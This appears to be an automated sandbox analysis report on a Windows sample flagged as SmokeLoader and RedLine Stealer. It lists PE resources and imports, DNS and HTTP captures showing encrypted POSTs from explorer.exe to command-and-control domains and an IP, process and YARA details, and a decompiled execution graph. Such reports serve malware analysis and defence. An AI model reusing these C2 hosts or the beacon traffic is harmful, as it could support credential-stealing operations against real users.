                      RT_ICON0x499900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                      RT_ICON0x4a0580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                      RT_ICON0x4c6000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                      RT_ICON0x4ca980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                      RT_ICON0x4d9400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                      RT_ICON0x4e1e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                      RT_ICON0x4e7500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                      RT_ICON0x50cf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                      RT_ICON0x51da00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                      RT_ICON0x527280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                      RT_ICON0x52bf80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                      RT_ICON0x53aa00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                      RT_ICON0x543480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                      RT_ICON0x54a100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                      RT_ICON0x54f780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                      RT_ICON0x575200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                      RT_ICON0x585c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                      RT_ICON0x58a980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSlovakSlovakia
                      RT_ICON0x599400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSlovakSlovakia
                      RT_ICON0x5a1e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSlovakSlovakia
                      RT_ICON0x5a8b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSlovakSlovakia
                      RT_ICON0x5ae180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SlovakSlovakia
                      RT_ICON0x5d3c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SlovakSlovakia
                      RT_ICON0x5e4680x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SlovakSlovakia
                      RT_ICON0x5edf00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SlovakSlovakia
                      RT_STRING0x62fc80x546dataSlovakSlovakia
                      RT_ACCELERATOR0x613d80x40dataSlovakSlovakia
                      RT_GROUP_CURSOR0x62ba80x22dataSlovakSlovakia
                      RT_GROUP_CURSOR0x62db00x22dataSlovakSlovakia
                      RT_GROUP_ICON0x58a300x68dataSlovakSlovakia
                      RT_GROUP_ICON0x4ca680x30dataSlovakSlovakia
                      RT_GROUP_ICON0x52b900x68dataSlovakSlovakia
                      RT_GROUP_ICON0x5f2580x76dataSlovakSlovakia
                      RT_VERSION0x62dd80x1f0MS Windows COFF PowerPC object fileSlovakSlovakia
                      None0x614180xadataSlovakSlovakia
                      None0x614280xadataSlovakSlovakia
                      DLLImport
                      KERNEL32.dllFillConsoleOutputCharacterA, GetCPInfo, GetProfileIntW, GetSystemDefaultLCID, GetModuleHandleW, WaitNamedPipeW, TlsSetValue, GetPriorityClass, GetVolumeInformationA, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, GetCalendarInfoW, GetFileAttributesA, TransactNamedPipe, WriteConsoleW, GetVolumePathNameA, CreateJobObjectA, GetVolumeNameForVolumeMountPointA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, SetFileAttributesA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, OpenJobObjectW, FoldStringW, FoldStringA, FindFirstChangeNotificationA, GetFileInformationByHandle, FindActCtxSectionStringW, LCMapStringW, GetConsoleAliasesW, GetFullPathNameW, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleOutputCP, MultiByteToWideChar, SetStdHandle, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetModuleHandleA, HeapSize, GetLocaleInfoA, LCMapStringA, GetStringTypeA, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile
                      ADVAPI32.dllBackupEventLogW
                      Language of compilation systemCountry where language is spokenMap
                      SlovakSlovakia
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 9, 2022 10:35:01.859349012 CET4970480192.168.2.584.21.172.159
                      Dec 9, 2022 10:35:01.885931015 CET804970484.21.172.159192.168.2.5
                      Dec 9, 2022 10:35:01.886043072 CET4970480192.168.2.584.21.172.159
                      Dec 9, 2022 10:35:01.886162996 CET4970480192.168.2.584.21.172.159
                      Dec 9, 2022 10:35:01.886178970 CET4970480192.168.2.584.21.172.159
                      Dec 9, 2022 10:35:01.914613962 CET804970484.21.172.159192.168.2.5
                      Dec 9, 2022 10:35:02.003720999 CET804970484.21.172.159192.168.2.5
                      Dec 9, 2022 10:35:02.003875017 CET4970480192.168.2.584.21.172.159
                      Dec 9, 2022 10:35:02.005376101 CET4970480192.168.2.584.21.172.159
                      Dec 9, 2022 10:35:02.032603025 CET804970484.21.172.159192.168.2.5
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 9, 2022 10:35:01.559169054 CET4972453192.168.2.58.8.8.8
                      Dec 9, 2022 10:35:01.852946043 CET53497248.8.8.8192.168.2.5
                      Dec 9, 2022 10:35:02.013329029 CET6145253192.168.2.58.8.8.8
                      Dec 9, 2022 10:35:03.018937111 CET6145253192.168.2.58.8.8.8
                      Dec 9, 2022 10:35:04.034967899 CET6145253192.168.2.58.8.8.8
                      Dec 9, 2022 10:35:06.042310953 CET53614528.8.8.8192.168.2.5
                      Dec 9, 2022 10:35:07.043878078 CET53614528.8.8.8192.168.2.5
                      Dec 9, 2022 10:35:08.090504885 CET53614528.8.8.8192.168.2.5
                      TimestampSource IPDest IPChecksumCodeType
                      Dec 9, 2022 10:35:07.045248032 CET192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                      Dec 9, 2022 10:35:08.090667009 CET192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Dec 9, 2022 10:35:01.559169054 CET192.168.2.58.8.8.80x54a4Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                      Dec 9, 2022 10:35:02.013329029 CET192.168.2.58.8.8.80xc44fStandard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      Dec 9, 2022 10:35:03.018937111 CET192.168.2.58.8.8.80xc44fStandard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      Dec 9, 2022 10:35:04.034967899 CET192.168.2.58.8.8.80xc44fStandard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Dec 9, 2022 10:35:01.852946043 CET8.8.8.8192.168.2.50x54a4No error (0)host-file-host6.com84.21.172.159A (IP address)IN (0x0001)false
                      Dec 9, 2022 10:35:06.042310953 CET8.8.8.8192.168.2.50xc44fServer failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      Dec 9, 2022 10:35:07.043878078 CET8.8.8.8192.168.2.50xc44fServer failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      Dec 9, 2022 10:35:08.090504885 CET8.8.8.8192.168.2.50xc44fServer failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      • nwisehi.com
                        • host-file-host6.com
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.54970484.21.172.15980C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Dec 9, 2022 10:35:01.886162996 CET121OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://nwisehi.com/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 217
                      Host: host-file-host6.com
                      Dec 9, 2022 10:35:01.886178970 CET121OUTData Raw: 10 87 f5 94 6d f5 a0 b7 c9 3a 0c 47 0a ba ec f3 36 63 df 36 a7 30 6e ea bd 9e d9 f1 fb d4 93 81 1d b5 5e a3 6b 1b cb ed e1 de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd ce f0 d8 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4c b6 cf 26
                      Data Ascii: m:G6c60n^kwmwu$f]dL&Ybr'#Yx2\zF}qFh|ds21]Fu;R#X7c[_9$"<noS1DEg%mO19%Ul3C''R~$3c}M
                      Dec 9, 2022 10:35:02.003720999 CET121INHTTP/1.1 200 OK
                      Server: nginx/1.20.2
                      Date: Fri, 09 Dec 2022 09:35:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: fYour IP blocked0


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:10:33:59
                      Start date:09/12/2022
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\file.exe
                      Imagebase:0x400000
                      File size:391680 bytes
                      MD5 hash:56DF4686B20D79D1E9070C908DBF9058
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.311136016.00000000005C3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Target ID:1
                      Start time:10:34:05
                      Start date:09/12/2022
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\file.exe
                      Imagebase:0x400000
                      File size:391680 bytes
                      MD5 hash:56DF4686B20D79D1E9070C908DBF9058
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.396112310.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.396112310.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.396068143.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.396068143.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Target ID:2
                      Start time:10:34:11
                      Start date:09/12/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff69bc80000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high

                      Target ID:5
                      Start time:10:35:01
                      Start date:09/12/2022
                      Path:C:\Users\user\AppData\Roaming\ehddsbh
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\ehddsbh
                      Imagebase:0x400000
                      File size:391680 bytes
                      MD5 hash:56DF4686B20D79D1E9070C908DBF9058
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.446345716.0000000000583000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low

                      Target ID:6
                      Start time:10:35:08
                      Start date:09/12/2022
                      Path:C:\Users\user\AppData\Roaming\ehddsbh
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\ehddsbh
                      Imagebase:0x400000
                      File size:391680 bytes
                      MD5 hash:56DF4686B20D79D1E9070C908DBF9058
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Reset < >

                        Execution Graph

                        Execution Coverage:4.2%
                        Dynamic/Decrypted Code Coverage:1.6%
                        Signature Coverage:5.8%
                        Total number of Nodes:1644
                        Total number of Limit Nodes:19
                        execution_graph 8593 406f19 8630 408168 8593->8630 8595 406f25 GetStartupInfoW 8596 406f48 8595->8596 8631 4074c4 HeapCreate 8596->8631 8599 406f98 8633 40beb9 GetModuleHandleW 8599->8633 8603 406fa9 __RTC_Initialize 8667 40a6f1 8603->8667 8604 406ef0 _fast_error_exit 68 API calls 8604->8603 8606 406fb7 8607 406fc3 GetCommandLineW 8606->8607 8744 406be8 8606->8744 8682 40cb55 GetEnvironmentStringsW 8607->8682 8611 406fd2 8688 40caa7 GetModuleFileNameW 8611->8688 8613 406fdc 8614 406fe7 8613->8614 8615 406be8 __amsg_exit 68 API calls 8613->8615 8692 40c878 8614->8692 8615->8614 8618 406ff8 8705 406ca7 8618->8705 8619 406be8 __amsg_exit 68 API calls 8619->8618 8621 406fff 8622 406be8 __amsg_exit 68 API calls 8621->8622 8623 40700a __wwincmdln 8621->8623 8622->8623 8711 4058a1 8623->8711 8626 407039 8754 406e84 8626->8754 8629 40703e _fprintf 8630->8595 8632 406f8c 8631->8632 8632->8599 8736 406ef0 8632->8736 8634 40bed4 8633->8634 8635 40becd 8633->8635 8637 40c03c 8634->8637 8638 40bede GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8634->8638 8757 406bb8 8635->8757 8818 40bbd3 8637->8818 8641 40bf27 TlsAlloc 8638->8641 8643 406f9e 8641->8643 8644 40bf75 TlsSetValue 8641->8644 8643->8603 8643->8604 8644->8643 8645 40bf86 8644->8645 8761 406ea2 8645->8761 8650 40baa9 __encode_pointer 7 API calls 8651 40bfa6 8650->8651 8652 40baa9 __encode_pointer 7 API calls 8651->8652 8653 40bfb6 8652->8653 8654 40baa9 __encode_pointer 7 API calls 8653->8654 8655 40bfc6 8654->8655 8780 4074f4 8655->8780 8662 40bb24 __decode_pointer 6 API calls 8663 40c01a 8662->8663 8663->8637 8664 40c021 8663->8664 8800 40bc10 8664->8800 8666 40c029 GetCurrentThreadId 8666->8643 9146 408168 8667->9146 8669 40a6fd GetStartupInfoA 8670 40d6bc __calloc_crt 68 API calls 8669->8670 8677 40a71e 8670->8677 8671 40a93c _fprintf 8671->8606 8672 40a8b9 GetStdHandle 8676 40a883 8672->8676 8673 40a91e SetHandleCount 8673->8671 8674 40d6bc __calloc_crt 68 API calls 8674->8677 8675 40a8cb GetFileType 8675->8676 8676->8671 8676->8672 8676->8673 8676->8675 8678 40c782 __getstream InitializeCriticalSectionAndSpinCount 8676->8678 8677->8671 8677->8674 8677->8676 8679 40a806 8677->8679 8678->8676 8679->8671 8679->8676 8680 40a82f GetFileType 8679->8680 8681 40c782 __getstream InitializeCriticalSectionAndSpinCount 8679->8681 8680->8679 8681->8679 8683 40cb66 8682->8683 8685 40cb6a 8682->8685 8683->8611 8684 40d677 __malloc_crt 68 API calls 8686 40cb8b _realloc 8684->8686 8685->8684 8687 40cb92 FreeEnvironmentStringsW 8686->8687 8687->8611 8689 40cadc _wparse_cmdline 8688->8689 8690 40d677 __malloc_crt 68 API calls 8689->8690 8691 40cb1f _wparse_cmdline 8689->8691 8690->8691 8691->8613 8693 40c890 _wcslen 8692->8693 8697 406fed 8692->8697 8694 40d6bc __calloc_crt 68 API calls 8693->8694 8700 40c8b4 _wcslen 8694->8700 8695 40c919 8696 40617d __getstream 68 API calls 8695->8696 8696->8697 8697->8618 8697->8619 8698 40d6bc __calloc_crt 68 API calls 8698->8700 8699 40c93f 8701 40617d __getstream 68 API calls 8699->8701 8700->8695 8700->8697 8700->8698 8700->8699 8703 40c8fe 8700->8703 9147 4112eb 8700->9147 8701->8697 8703->8700 8704 40973f __invoke_watson 10 API calls 8703->8704 8704->8703 8707 406cb5 __IsNonwritableInCurrentImage 8705->8707 9156 40c1d0 8707->9156 8708 406cd3 __initterm_e 8710 406cf2 __IsNonwritableInCurrentImage __initterm 8708->8710 9160 40c16d 8708->9160 8710->8621 8712 4058cb GetLastError TransactNamedPipe 8711->8712 8712->8712 8713 4058e1 8712->8713 8714 405f9a LoadLibraryA 8713->8714 8715 405ede WriteConsoleA IsProcessInJob GetPriorityClass 8713->8715 9260 404ec6 8714->9260 9284 406707 8715->9284 8719 405f0b 8720 40617d __getstream 68 API calls 8719->8720 8721 405f26 8720->8721 8722 40625a _malloc 68 API calls 8721->8722 8723 405f2d 8722->8723 9307 406642 8723->9307 8725 405f40 9324 4065ef 8725->9324 8729 405f59 9345 406b33 8729->9345 8731 405f62 9358 404b2a 8731->9358 8735 405f77 8735->8714 8737 406f03 8736->8737 8738 406efe 8736->8738 8740 40835c __NMSG_WRITE 68 API calls 8737->8740 8739 408507 __FF_MSGBANNER 68 API calls 8738->8739 8739->8737 8741 406f0b 8740->8741 8742 406c3c _doexit 3 API calls 8741->8742 8743 406f15 8742->8743 8743->8599 8745 408507 __FF_MSGBANNER 68 API calls 8744->8745 8746 406bf2 8745->8746 8747 40835c __NMSG_WRITE 68 API calls 8746->8747 8748 406bfa 8747->8748 8749 40bb24 __decode_pointer 6 API calls 8748->8749 8750 406c05 8749->8750 8750->8607 8751 406e58 10483 406d2c 8751->10483 8753 406e69 8753->8626 8755 406d2c _doexit 68 API calls 8754->8755 8756 406e8f 8755->8756 8756->8629 8758 406bc3 Sleep GetModuleHandleW 8757->8758 8759 406be1 8758->8759 8760 406be5 8758->8760 8759->8758 8759->8760 8760->8634 8824 40bb1b 8761->8824 8763 406eaa __init_pointers __initp_misc_winsig 8827 40c3d1 8763->8827 8766 40baa9 __encode_pointer 7 API calls 8767 406ee6 8766->8767 8768 40baa9 TlsGetValue 8767->8768 8769 40bac1 8768->8769 8770 40bae2 GetModuleHandleW 8768->8770 8769->8770 8771 40bacb TlsGetValue 8769->8771 8772 40baf2 8770->8772 8773 40bafd GetProcAddress 8770->8773 8775 40bad6 8771->8775 8774 406bb8 __crt_waiting_on_module_handle 2 API calls 8772->8774 8779 40bada 8773->8779 8776 40baf8 8774->8776 8775->8770 8775->8779 8776->8773 8777 40bb15 8776->8777 8777->8650 8778 40bb0d RtlEncodePointer 8778->8777 8779->8777 8779->8778 8781 4074ff 8780->8781 8783 40752d 8781->8783 8830 40c782 8781->8830 8783->8637 8784 40bb24 TlsGetValue 8783->8784 8785 40bb3c 8784->8785 8786 40bb5d GetModuleHandleW 8784->8786 8785->8786 8789 40bb46 TlsGetValue 8785->8789 8787 40bb78 GetProcAddress 8786->8787 8788 40bb6d 8786->8788 8793 40bb55 8787->8793 8790 406bb8 __crt_waiting_on_module_handle 2 API calls 8788->8790 8792 40bb51 8789->8792 8791 40bb73 8790->8791 8791->8787 8791->8793 8792->8786 8792->8793 8793->8637 8794 40d6bc 8793->8794 8797 40d6c5 8794->8797 8796 40c000 8796->8637 8796->8662 8797->8796 8798 40d6e3 Sleep 8797->8798 8835 411374 8797->8835 8799 40d6f8 8798->8799 8799->8796 8799->8797 9125 408168 8800->9125 8802 40bc1c GetModuleHandleW 8803 40bc2c 8802->8803 8807 40bc32 8802->8807 8804 406bb8 __crt_waiting_on_module_handle 2 API calls 8803->8804 8804->8807 8805 40bc4a GetProcAddress GetProcAddress 8806 40bc6e 8805->8806 8808 407670 __lock 64 API calls 8806->8808 8807->8805 8807->8806 8809 40bc8d InterlockedIncrement 8808->8809 9126 40bce5 8809->9126 8812 407670 __lock 64 API calls 8813 40bcae 8812->8813 9129 40ef35 InterlockedIncrement 8813->9129 8815 40bccc 9141 40bcee 8815->9141 8817 40bcd9 _fprintf 8817->8666 8819 40bbe9 8818->8819 8820 40bbdd 8818->8820 8822 40bc0b 8819->8822 8823 40bbfd TlsFree 8819->8823 8821 40bb24 __decode_pointer 6 API calls 8820->8821 8821->8819 8822->8822 8823->8822 8825 40baa9 __encode_pointer 7 API calls 8824->8825 8826 40bb22 8825->8826 8826->8763 8828 40baa9 __encode_pointer 7 API calls 8827->8828 8829 406edc 8828->8829 8829->8766 8834 408168 8830->8834 8832 40c78e InitializeCriticalSectionAndSpinCount 8833 40c7d2 _fprintf 8832->8833 8833->8781 8834->8832 8836 411380 _fprintf 8835->8836 8837 411398 8836->8837 8847 4113b7 _memset 8836->8847 8848 40747b 8837->8848 8841 411429 RtlAllocateHeap 8841->8847 8843 4113ad _fprintf 8843->8797 8847->8841 8847->8843 8854 407670 8847->8854 8861 407e82 8847->8861 8867 411470 8847->8867 8870 40854f 8847->8870 8873 40bcf7 GetLastError 8848->8873 8850 407480 8851 409867 8850->8851 8852 40bb24 __decode_pointer 6 API calls 8851->8852 8853 409877 __invoke_watson 8852->8853 8855 407685 8854->8855 8856 407698 EnterCriticalSection 8854->8856 8920 4075ad 8855->8920 8856->8847 8858 40768b 8858->8856 8859 406be8 __amsg_exit 67 API calls 8858->8859 8860 407697 8859->8860 8860->8856 8863 407eb0 8861->8863 8862 407f49 8866 407f52 8862->8866 9120 407a99 8862->9120 8863->8862 8863->8866 9113 4079e9 8863->9113 8866->8847 9124 407596 LeaveCriticalSection 8867->9124 8869 411477 8869->8847 8871 40bb24 __decode_pointer 6 API calls 8870->8871 8872 40855f 8871->8872 8872->8847 8887 40bb9f TlsGetValue 8873->8887 8876 40bd64 SetLastError 8876->8850 8877 40d6bc __calloc_crt 65 API calls 8878 40bd22 8877->8878 8878->8876 8879 40bb24 __decode_pointer 6 API calls 8878->8879 8880 40bd3c 8879->8880 8881 40bd43 8880->8881 8882 40bd5b 8880->8882 8883 40bc10 __initptd 65 API calls 8881->8883 8892 40617d 8882->8892 8885 40bd4b GetCurrentThreadId 8883->8885 8885->8876 8886 40bd61 8886->8876 8888 40bbb4 8887->8888 8889 40bbcf 8887->8889 8890 40bb24 __decode_pointer 6 API calls 8888->8890 8889->8876 8889->8877 8891 40bbbf TlsSetValue 8890->8891 8891->8889 8893 406189 _fprintf 8892->8893 8894 406202 __dosmaperr _fprintf 8893->8894 8896 407670 __lock 66 API calls 8893->8896 8904 4061c8 8893->8904 8894->8886 8895 4061dd HeapFree 8895->8894 8897 4061ef 8895->8897 8900 4061a0 ___sbh_find_block 8896->8900 8898 40747b __openfile 66 API calls 8897->8898 8899 4061f4 GetLastError 8898->8899 8899->8894 8901 4061ba 8900->8901 8905 4076d3 8900->8905 8912 4061d3 8901->8912 8904->8894 8904->8895 8906 407712 8905->8906 8911 4079b4 8905->8911 8907 4078fe VirtualFree 8906->8907 8906->8911 8908 407962 8907->8908 8909 407971 VirtualFree HeapFree 8908->8909 8908->8911 8915 40d760 8909->8915 8911->8901 8919 407596 LeaveCriticalSection 8912->8919 8914 4061da 8914->8904 8916 40d778 8915->8916 8917 40d79f __VEC_memcpy 8916->8917 8918 40d7a7 8916->8918 8917->8918 8918->8911 8919->8914 8921 4075b9 _fprintf 8920->8921 8922 4075df 8921->8922 8946 408507 8921->8946 8928 4075ef _fprintf 8922->8928 8992 40d677 8922->8992 8928->8858 8930 407610 8934 407670 __lock 68 API calls 8930->8934 8931 407601 8933 40747b __openfile 68 API calls 8931->8933 8933->8928 8935 407617 8934->8935 8936 40764b 8935->8936 8937 40761f 8935->8937 8939 40617d __getstream 68 API calls 8936->8939 8938 40c782 __getstream InitializeCriticalSectionAndSpinCount 8937->8938 8940 40762a 8938->8940 8945 40763c 8939->8945 8941 40617d __getstream 68 API calls 8940->8941 8940->8945 8943 407636 8941->8943 8944 40747b __openfile 68 API calls 8943->8944 8944->8945 8998 407667 8945->8998 9001 40ddce 8946->9001 8949 40851b 8951 40835c __NMSG_WRITE 68 API calls 8949->8951 8953 4075ce 8949->8953 8950 40ddce __set_error_mode 68 API calls 8950->8949 8952 408533 8951->8952 8954 40835c __NMSG_WRITE 68 API calls 8952->8954 8955 40835c 8953->8955 8954->8953 8956 408370 8955->8956 8957 4075d5 8956->8957 8958 40ddce __set_error_mode 65 API calls 8956->8958 8989 406c3c 8957->8989 8959 408392 8958->8959 8960 4084d0 GetStdHandle 8959->8960 8961 40ddce __set_error_mode 65 API calls 8959->8961 8960->8957 8962 4084de _strlen 8960->8962 8963 4083a3 8961->8963 8962->8957 8965 4084f7 WriteFile 8962->8965 8963->8960 8964 4083b5 8963->8964 8964->8957 9007 40dd66 8964->9007 8965->8957 8968 4083eb GetModuleFileNameA 8970 408409 8968->8970 8975 40842c _strlen 8968->8975 8972 40dd66 _strcpy_s 65 API calls 8970->8972 8973 408419 8972->8973 8973->8975 8976 40973f __invoke_watson 10 API calls 8973->8976 8974 40846f 9032 40dc3d 8974->9032 8975->8974 9023 40dcb1 8975->9023 8976->8975 8980 408493 8983 40dc3d _strcat_s 65 API calls 8980->8983 8982 40973f __invoke_watson 10 API calls 8982->8980 8984 4084a7 8983->8984 8986 4084b8 8984->8986 8987 40973f __invoke_watson 10 API calls 8984->8987 8985 40973f __invoke_watson 10 API calls 8985->8974 9041 40dad4 8986->9041 8987->8986 9079 406c11 GetModuleHandleW 8989->9079 8995 40d680 8992->8995 8994 4075fa 8994->8930 8994->8931 8995->8994 8996 40d697 Sleep 8995->8996 9082 40625a 8995->9082 8997 40d6ac 8996->8997 8997->8994 8997->8995 9112 407596 LeaveCriticalSection 8998->9112 9000 40766e 9000->8928 9002 40dddd 9001->9002 9003 40747b __openfile 68 API calls 9002->9003 9006 40850e 9002->9006 9004 40de00 9003->9004 9005 409867 __openfile 6 API calls 9004->9005 9005->9006 9006->8949 9006->8950 9008 40dd77 9007->9008 9009 40dd7e 9007->9009 9008->9009 9012 40dda4 9008->9012 9010 40747b __openfile 68 API calls 9009->9010 9015 40dd83 9010->9015 9011 409867 __openfile 6 API calls 9014 4083d7 9011->9014 9013 40747b __openfile 68 API calls 9012->9013 9012->9014 9013->9015 9014->8968 9016 40973f 9014->9016 9015->9011 9068 40b080 9016->9068 9018 40976c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9019 409848 GetCurrentProcess TerminateProcess 9018->9019 9020 40983c __invoke_watson 9018->9020 9070 40dac5 9019->9070 9020->9019 9022 4083e8 9022->8968 9028 40dcc3 9023->9028 9024 40dcc7 9025 40845c 9024->9025 9026 40747b __openfile 68 API calls 9024->9026 9025->8974 9025->8985 9027 40dce3 9026->9027 9029 409867 __openfile 6 API calls 9027->9029 9028->9024 9028->9025 9030 40dd0d 9028->9030 9029->9025 9030->9025 9031 40747b __openfile 68 API calls 9030->9031 9031->9027 9034 40dc55 9032->9034 9035 40dc4e 9032->9035 9033 40747b __openfile 68 API calls 9036 40dc5a 9033->9036 9034->9033 9035->9034 9039 40dc89 9035->9039 9037 409867 __openfile 6 API calls 9036->9037 9038 408482 9037->9038 9038->8980 9038->8982 9039->9038 9040 40747b __openfile 68 API calls 9039->9040 9040->9036 9042 40bb1b _doexit 7 API calls 9041->9042 9043 40dae4 9042->9043 9044 40daf7 LoadLibraryA 9043->9044 9046 40db7f 9043->9046 9045 40db0c GetProcAddress 